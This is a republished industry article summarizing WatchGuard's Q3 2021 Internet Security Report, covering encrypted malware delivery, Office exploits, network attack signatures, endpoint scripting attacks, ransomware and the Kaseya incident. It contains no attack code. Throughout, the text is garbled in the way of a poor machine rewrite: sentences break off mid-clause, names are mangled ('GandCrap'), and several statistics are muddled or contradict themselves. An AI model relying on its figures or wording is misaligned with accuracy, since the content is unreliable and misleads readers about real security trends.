By Corey Nachreiner, CSO, WatchGuard Technologies
Today’s cybersecurity landscape is constantly evolving, and threat actors target users with increasingly sophisticated and complex attacks. To better understand the current state of these threats for both experts and regular Internet users, WatchGuard is providing quarterly updates. Internet Security Report (ISR), Overview of Latest Malware and Network Attacks, Q3 2021.
By the end of the third quarter of 2021, the amount of endpoint malware and ransomware will exceed all of 2020, according to the most shocking stats in this recent report. Threat Lab) also shows that a significant percentage of malware continues to arrive via encrypted connections, as we saw in the previous quarter. While most people continue to work in hybrid or mobile workforce models, critical organizations go beyond traditional approaches to cybersecurity, leveraging a layered security approach and zero trust. Let’s take a look at some of the key insights from the Q3 ISR.
- Nearly half of zero-day malware is now delivered over encrypted connections.– While the total amount of zero-day malware increased 3% in Q3 to 67.2%, the proportion of malware arriving via Transport Layer Security (TLS) surged from 31.6% to 47%. While a lower percentage of encrypted zero-days is considered advanced, WatchGuard’s data shows that many organizations aren’t decrypting these connections, giving them poor visibility into how much malware is infiltrating their networks.
- As users upgrade to the latest versions of Microsoft Windows and Office, attackers are focusing on new vulnerabilities. Unpatched vulnerabilities in older software continue to provide a rich hunting ground for attackers, but they also seek to exploit vulnerabilities in newer versions of popular Microsoft products. In Q3, CVE-2018-0802, which exploits Microsoft Office’s Equation Editor vulnerability, cracked WatchGuard’s top 10 gateway antivirus malware into its volume list, coming into sixth place after appearing on the list of most prevalent malware in the previous quarter. . Additionally, two Windows code injectors (Win32/Heim.D and Win32/Heri) took first and sixth places respectively on the most searched list.
- The attackers have targeted America disproportionately. – The overwhelming majority of network attacks targeted the Americas (64.5%) in Q3 compared to Europe (15.5%) and APAC (20%).
- Although overall network attack detection has resumed on a more normal trajectory, it still poses significant risks.WatchGuard’s Intrusion Prevention Service (IPS) detected approximately 4.1 million unique network exploits in the third quarter after growing more than 20% for a straight quarter. A decline of 21% brought volume down to Q1 levels, which were still high compared to the previous year. Change doesn’t necessarily mean that your enemies are giving up. This is because enemies are likely to shift their focus to more targeted attacks.
- Top 10 network attack signatures account for the majority of attacks. Of the 4,095,320 hits detected by IPS in Q3, 81% were attributed to the top 10 signatures. In fact, the new signature in the top 10 in Q3 is ‘/etc/passwd with WEB remote files’ (1054837), the old but still popular Microsoft Internet Information Services (IIS) web server. one signature (1059160), SQL Injection has maintained the top spot on the list since Q2 2019.
- Scripting attacks on endpoints continue at record speed.– By the end of Q3, WatchGuard’s AD360 Threat Intelligence and WatchGuard Endpoint Protection, Detection and Response (EPDR) had already identified 10% more attack scripts than in the whole of 2020 (a 666% increase year-over-year). ). As the hybrid workforce begins to look like the rule rather than the exception, strong vigilance is no longer sufficient to block threats. There are many ways cybercriminals can attack endpoints, from application exploits to script-based overseas residency attacks, but even those with limited skills can use scripting tools such as PowerSploit, PowerWare, and Cobalt Strike to fully execute the malware payload. can. While circumventing basic endpoint detection.
- Normally secure domains can also be compromised.A protocol flaw in the Microsoft Exchange Server Autodiscover system could allow an attacker to collect domain credentials and compromise several commonly trusted domains. Overall, Q3 WatchGuard Firebox includes several new malware domains attempting to install software for cryptomining, key loggers, and remote access Trojans (RATs), as well as phishing domains masquerading as SharePoint sites to gather Office365 login credentials. to block 5.6 million malicious domains. Although down 23% from the previous quarter, the number of blocked domains is still many times higher than the level in Q4 2020 (1.3 million). This highlights the critical need for organizations to focus on updating their servers, databases, websites and systems with the latest patches to limit vulnerabilities that attackers can exploit.
- ransomware, ransomware, ransomware– Ransomware attacks declined sharply in 2020 and then reached 105% of 2020 volume by the end of September (as WatchGuard predicted at the end of the previous quarter) and is on track to reach 150% by the end of 2021 when analyzing full data. . . Ransomware-as-a-service operations such as REvil and GandCrap continue to lower the bar for criminals with little or no coding skills, the infrastructure and malware pay to conduct attacks globally in exchange for a percentage of ransomware. load is provided.
- The top security incident of the quarter, Kaseya, is another example of the continuing threat of digital supply chain attacks. – just before the start of the long 4WorkDozens of organizations began reporting ransomware attacks on endpoints over the US July holiday weekend. WatchGuard’s incident analysis showed that attackers performing REvil ransomware-as-a-service (RaaS) operations were using Kaseya VSA Remote Monitoring and Management (RMM) software to deploy ransomware to approximately 1,500 organizations and potentially millions of endpoints. Deploy. Although the FBI eventually compromised REvil’s servers and obtained the decryption key months later, the attack allowed organizations to adopt the zero-trust principle, adopt the principle of least privilege for supplier access, and ensure that systems are patched and updated to minimize the impact of supply chain attacks. Check the status.
The third quarter saw a spike in malware per device, the first increase since the pandemic began. Looking into 2021, it is clear that cybersecurity continues to challenge users. Core organizations think about the long-term ups and downs and focus on ongoing trends that affect their security posture. A strong cybersecurity strategy includes endpoint protection, multi-factor authentication, and secure Wi-Fi. When implemented properly, users can significantly mitigate external threats.
About the author
Corey Nachreiner WatchGuard Technology. A front-line cybersecurity expert for nearly two decades, Corey regularly contributes to security publications and speaks internationally at major industry trade shows such as RSA. He has written thousands of security warning and educational articles, secret community, daily videos and content on the latest security threats, news and best practices. As a Certified Information Systems Security Specialist (CISSP), Corey enjoys “modding” every tech gadget he can get his hands on. Corey can be reached via @SecAdept on Twitter or https://www.watchguard.com.
Fair Use Notice: “Fair use” laws allow other authors to make limited use of the original author’s work without permission. Under 17 US Code § 107, “It is not copyright infringement to use copyrighted material for purposes such as criticism, commentary, news reporting, education (including multiple copies for classroom use), scholarship, or research.” As a matter of policy, fair use is based on the belief that the public is free to use portions of copyrighted material for the purposes of comment and criticism. Fair use privileges are perhaps the most important restrictions on the exclusive rights of copyright owners. Cyber Defense Media Group is a news reporting company that reports cyber news, events, information and more free of charge on its website Cyber Defense Magazine. All images and reporting are conducted exclusively in accordance with the fair use of US copyright laws.